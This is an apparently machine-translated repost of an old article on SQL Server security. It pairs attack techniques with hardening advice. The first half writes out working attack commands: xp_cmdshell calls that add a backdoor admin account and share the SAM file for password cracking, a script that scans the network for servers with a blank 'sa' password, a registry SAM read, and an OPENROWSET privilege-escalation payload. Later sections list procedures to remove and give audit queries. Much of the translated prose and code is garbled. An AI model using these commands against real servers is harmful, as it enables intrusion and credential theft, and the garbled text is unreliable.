Some security issues about SQL Server

zhaozj2021-02-11  220

At present, there are many ways to invade the NT server, such as the use of the vulnerability of IIS, but

Everyone doesn't know not to pay attention, actually through the SQL database server associated with the NT server.

The example is also a very proportional means. You can see a news report below:

Http://www.vnunet.com/news/1110938.

Herbless intrusted some sites, such as Legoland.co.uk sites are through SQL servers

The invasion is destroyed to the control of the system. So the protection of SQL servers is not

Less, here I organize some vulnerabilities for everyone to refer, laugh, laugh.

-------------------------------------------------- ----------------

Let's first take a look at the network protocol library supported by the SQL service program:

-------------------------------------------------- ----------------

| SQL Server Network Protocol Libraries |

-------------------------------------------------- ----------------

Protocol Library | Possible Vulnerabilities | Whether encryption |

-------------------------------------------------- ----------------

| Named Pipes | - Using NT SMB port (TCP139, UDP137, | No |

| (Anti-name pipeline) | 138) to communicate, these can be pass | |

| | Firewall control, but if the internal network can | |

| | Free access to it is also a small defect | |

| | - User name, password, and data are not added | |

| | Transfer, anyone can come through Sniffer | |

| | Data capture. | | |

-------------------------------------------------- ----------------

| IP sockets | - Default Status Open 1433, you can use | No |

| | Scanner to view this port. | | |

| | Can be intercepted by Sniffer. | | |

-------------------------------------------------- ----------------

| Multi-Protocol | - Client Need to support NT RPCs; in different | Yes |

| | Kinds of types may cause problems. | | |

| - Use TCP random ports by default, but | | |

| | Firewall for port map fixation (ginseng | |

| | Look at KB Q164667). | | |

| | - Need to pay attention to whether the encryption option is selected, silently | |

| | Do not select this option. | | |

-------------------------------------------------- ----------------

| NWLINK | - There is a danger of intercepting data by Sniffer | No |

-------------------------------------------------- ----------------

AppleTalk (ADSP) | - Danger of Intercepting Data by Sniffer |

-------------------------------------------------- ----------------

Banyan Vines | - There is a risk of intercepting data by Sniffer | No |

-------------------------------------------------- -------------- General recommendation is: If you can use Named Pipes on Integrated (NT) Security or

Multi-Protocol, then you use these protocol libraries, if possible, try to use Multi-Protocol

And enable encryption options. If you can't use it above, use the IP Sockets protocol and change

Its default ports and check the system to ensure that there is no SNIFFER. And, consider using a Web service

Administrative Object Layer, or COM components, and serve in the intermediate layer and SQL

Secure channels are used in the order. There are a lot of third-party products to encrypt this communication.

-------------------------------------------------- ---------------------

Let's talk about how the SQL Server's security models and how they work?

Safety mode defines some SQL Server how to authenticate users to use them, please see below

SPL Server 6.5 security mode and some description and distinctions made in SQL Server 7.0:

-------------------------------------------------- -----------------

| Safety Mode | SQL Server 6.5 | SQL Server 7.0 Changing Place |

-------------------------------------------------- -----------------

| Standard | - Login Definition in SQL Server | - Separate Standard Mode in SQL Server |

| Standard mode | and give a password. | Not used. |

| | - SQL Server Login Account & | |

| | WINDOW NT Separate | | |

-------------------------------------------------- -----------------

| Integrated | - Using Security Manager SQL account | - Be here "Windows Nt Only" |

| Integrated mode | | Mode. |

| | - Users are connected to SQL Server | - only work under NT system, in Win9x is not |

| | No specific separation login and | support. |

| | Password. | | |

| | - Password never stored in the application | - can be used directly into the NT group easy |

| | In the plain text in the network | Management, (note that there is a Builtin group in |

| | Transport. | Produced on the local system). |

| | -Sql server can use NT | | |

| | Certification method to authenticate users | | | |

| | You can use an account expiration, etc. | | |

| | - Need Named Pipe or Multi- | |

| | Protocol library. | | |

-------------------------------------------------- ------------------

| Mixed | - Some specials from the above way | - Become SQL Server and Windows NT |

| Mixing method | Log but back things is customer | mode. |

| | NT cannot establish a trusted connection. | - Try to use Window NT Only mode | |

-------------------------------------------------- ------------------

Login is just the first step, once the user logs in, the user must access a separate database, to make the above

Establishment, there must be an expression to give the user to each database for users in the SYSUSERS table. So, please pay attention to whether there is a "guest" account in your database and to give it to give it when you don't pay attention.

Some people visited your database.

For details, please refer to Microsoft's site:

http://www.microsoft.com/technet/sql/technote/secure.asp

-------------------------------------------------- -------------------

Some security issues in SQL Server:

There is a "SA" account, the password is empty, and this password is a member of the SQL Server security module, we will

You can use XP_cmdshell Stored Procedure (Extended Store)

Order operation, such as:

XP_cmdshell "Net User Testuser Ugothacked / ADD"

Then in:

XP_cmdshell "Net localgroup administrators testuser / add"

Such an attacker adds a user to the SQL Server.

Of course, the distance is usually required to have 1433 ports, connect through the MySQL client.

Of course you can use:

XP_cmdshell "rdisk / s"

The method, so that information is rebuilt in the / WinNT / Repair directory without prompting users. then

After SAM backup, an attacker can create an SMB connection to a shared or establish a connection:

XP_cmdshell "Net Share Getsam = C: / Winnt / Repair"

Use the sharing to get this file and then use the L0PHTCRACK to run. If the SMB port is fired

Controlled, or closed, the attacker can also copy Sam._ file to the web directory for anonymous browser

download. If people have no IIS, why don't you use TFTP :).

OK, through this controlled SQL Server server, attackers can find inside the network through it

Other machines to expand the results, below is a SQL script to list other SQL Server existence in the network.

An example of empty account 'sa':

-------------------------------------------------- ---------------------

- Create Temp Table To Store Enumerated Servers

Set nocount on

Create Table #Temp (ShellDump Varchar (255))

INSERT #TEMP EXEC XP_CMDSHELL 'OSQL -L'

Declare @current_server varchar (255), @conn_string varchar (255)

Declare SQL_CURSOR CURSOR for SELECT * FROM #TEMP

Open SQL_CURSOR FETCH NEXT from SQL_CURSOR INTO @current_server

- Loop THROUGH Potential Targets and Check for Null Sa Accounts

- IF Target Is Vulnerable, Version Information Will Be Displayed

While @@ fetch_status = 0

Begin

IF @current_server <> 'Servers:' Begin

SELECT @current_server = rtrim (Ltrim (@current_server))

SELECT @conn_string = 'exec XP_cmdshell' 'osql -s' @current_server ' -usa -p -q "SELECT @@ version" ''

Print 'Attempting Connection To Server:' @current_server

Execute (@conn_string)

Print '=============================================== ===================== '

End

Fetch next from sql_cursor @current_server

End

- Clean Up

Close SQL_CURSOR

Deallocate SQL_CURSOR

DROP TABLE #TEMP

-------------------------------------------------- --------------------

Of course, some people may also close XP_cmdshell extended storedure,

We can also use the following methods:

XP_REGREAD 'HKEY_LOCAL_MACHINE', 'Security / Sam / Domains / Account', 'F'

If the MSSQLServer service is running under the local system account, if you don't have syskey on the system,

The call can return the encrypted password or SID in the registry.

-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------

Another vulnerability is the improvement of the rights about Adhoc Heterogenus Queries, please see the following Microsoft

Description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

With regard to the above vulnerabilities, you can use the following xploit to obtain the right to improve:

Select * from OpenRowSet ('sqloledb', 'trusted_connection = yes; data source = myserver ",

'Set fmtonly off execute master..xp_cmdshell "DIR C: /")

This is one of you like to do other orders, think you can think of it.

-------------------------------------------------- ------------------------- and the nearest vulnerability: Extended Stored Procedure Parameter Parsing

Process Parameters Analysis of the Vulnerability, Details In this URL:

Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.

The main problem is to provide an API function SRV_PARAMINFO () in the MSD. It is used to extend the stored procedure call.

Explain in depth parameters, such as:

Exec , , ...

To query the directory tree of "C: / Winnt", you can express it as follows:

EXEC XP_DIRTREE 'C: / WINNT'

But did not check the length of each parameter, pass a quite long string, there is a cover other stack

The parameters may result in buffering.

The process that is currently known is as follows:

It is known that the affected expansion stored procedures are as follows:

1, xp_peekqueue (xpqueue.dll)

XP_PrintStatements (XPREPL.DLL)

Giving the first parameter to deliver a long string override the return address saved by the exception handler.

2, XP_Proxiedmetata (XPREPL.DLL)

This stored procedure uses four parameters. Giving the second parameter to pass the long string override an abnormal place

The returned address saved by the procedure.

3, XP_setsqlsecurity (xpstar.dll)

This stored procedure uses four parameters. Give the third parameter to deliver a long string that will make the entire SQL

The Server process is terminated immediately.

4, xp_displayparamstmt (xprepl.dll)

XP_enumResultSet (XPREPL.DLL)

XP_ShowColv (XPREPL.DLL)

XP_UPDATECOLVBM (XPREPL.DLL)

Give the first parameter to deliver a long string that will cause illegal operation and override the returns saved by the exception handler.

Back address.

Here tells you a skillful thing, if you want to know that these extension stored procedures call the write DLL

Document, you can do this, such as:

Select O.Name, C.Text from dbo.syscomments C, dbo.sysObjects o where c.id = o.id and o.name = 'xp_peekqueue'

This way you can get the DLL that calls this extended stored procedure. If Microsoft has no patch, you will

Temporarily change this DLL file, of course, some DLL file calls several extended stored procedures and cannot be blindly changed.

Otherwise, other can't be used, you need to use the following to know that the DLL calls those extended stored procedures:

Select O.Name, C.Text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpueue.dll'

Fortunately, Microsoft has made a patch, you can find it below, don't have one to find a DLL program, huh, huh:

http://support.microsoft.com/support/sql/xp_security.asp

This vulnerability @stake discovers and provides a demonstration test code, you can find it here:

http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

-------------------------------------------------- ------------------------ OK, of course SQL Server also has some other vulnerabilities, relatively mild, such as the administrator discovered by ISS

Login ID is stored in the registry, its encryption method is simple, it is easy to get, detailed

Please see: http://xForce.iss.net/alerts/advise45.php3. Everyone can go to others

Location to find.

-------------------------------------------------- -------------------

Some security recommendations for SQL Server systems:

- Guarantee the latest security patches, as follows:

Windows NT 4.0 - Service Pack 6A

SQL Server 6.5 - Service Pack 5a

SQL Server 7.0 - Service Pack 2. (Various HotFixes - Check

http://www.microsoft.com/download)

SQL Server 2000 - HotFix S80233i.exe (Intel)

Of course, everyone must pay close attention to Microsoft's safety announcement.

- Do not use port 1433 in IP sockets, if you use multi-protocol

Modify the port.

- Don't embed the 'SA' password into any application such as VB / Delphi Apps, or one

In the global.asa file, because "sa" is a default password for SQL Server, its permissions

Similar to the administrator account with the Windows NT system, and the password is empty.

- Change the password of 'SA' and 'Probe' account.

- Ensure that SQL Server's error is recorded on the NTFS system.

- If you don't need xp_cmdshell (use sp_dropextendedproc 'xp_cmdshell')

Do not leave the XP_CMDSHELL Extended Stored Proc (extended stored procedure)

On the device. Enter: in any ISQL window:

Use master

sp_dropextendedProc 'XP_cmdshell'

- Discard No OLE automatic stored procedures, of course, some features in Enterprise Manager

Will not be used, these processes include the following:

SP_OACREATE SP_OADESTROY

SP_OAGETERRORINFO SP_OAGETPROPERTY

SP_OAMETHOD SP_OASETPROPERTY

SP_OASTOP

- Remove the unwanted registry access process, as follows:

XP_REGADDMULTINTISTRING

XP_RegdeleteKey

XP_Regdeletevalue

XP_RegenumValues

XP_REGREAD

XP_REGREMOVEMULTINTRING

XP_Regwrite

- Remove other system stored procedures, if you think you think you still have a threat, of course

Be careful with these processes, you can test them on the test machine to ensure you normal

The system can work, these processes include:

SP_BINDSESSION SP_CURSOR SP_CURSORCLOSE

SP_CURSORFETCH SP_CURSoropen sp_cursoroption

sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte

SP_OACREATE SP_OADESTROY SP_OAGETERRORINFOSP_OAGETPROPERTY SP_OAMETHOD SP_OASETPROPERTY

sp_oastop sp_replcmds sp_replcounters

SP_REPLDONE SP_REPLFLUSH SP_REPLSTATUS

SP_REPLTRANS SP_SDIDEBUG XP_AVAILAMEDIA

XP_cmdshell xp_deletemail xp_dirtree

XP_DROPWEBTASK XP_DSNInfo XP_ENUMDSN

XP_ENUMERROUPS XP_ENUMQUEDTASKS

XP_EVENTLOG XP_FINDNEXTMSG XP_FIXEDDRIVES

XP_GETFILEDETAILS XP_GETNETNAME XP_GRANTLOGIN

XP_LOGEVENT XP_LOGINCONFIG XP_LOGINFO

XP_makewebtask xp_msver xp_perfend

XP_PERFMONITOR XP_PERFSAMPLE XP_PERFSTART

XP_readerrorlog xp_readmail xp_revokelogin

XP_RunwebTask XP_SCHEDULERSIGNAL XP_SENDMAIL

XP_ServiceControl XP_SNMP_GETSTATE XP_SNMP_RASETRAP

XP_SPRINTF XP_SQLINVENTORY XP_SQLREGISTER

XP_SQLTRACE XP_SSCANF XP_STARTMAIL

XP_Stopmail XP_SUBDIRS XP_UNC_TO_DRIVE

- Remove the Guest user in the database.

- Turn off SQL Mail compatibility to prevent some Trojan viruses.

- Set a task handle to schedule the following program:

FINDSTR / C: "login failed" /msql7/log/*.* "

Redirect to other files or mail to the administrator mailbox.

- Take an account with an empty password frequently:

Use master

SELECT NAME,

Password

From syslogins

WHERE Password is Null

ORDER BY NAME

- Check all stored procedures and extended stored procedures that do not require 'sa' permission:

Use master

Select sysobjects.name

From sysobjects, sysprotects

Where sysprotects.uid = 0

And xtype in ('x', 'p')

And sysObjects.id = sysprotects.id

ORDER BY NAME

- Ensure that the transmission information of SQL Server is in an isolated network segment.

转载请注明原文地址:https://www.9cbs.com/read-3808.html

New Post(0)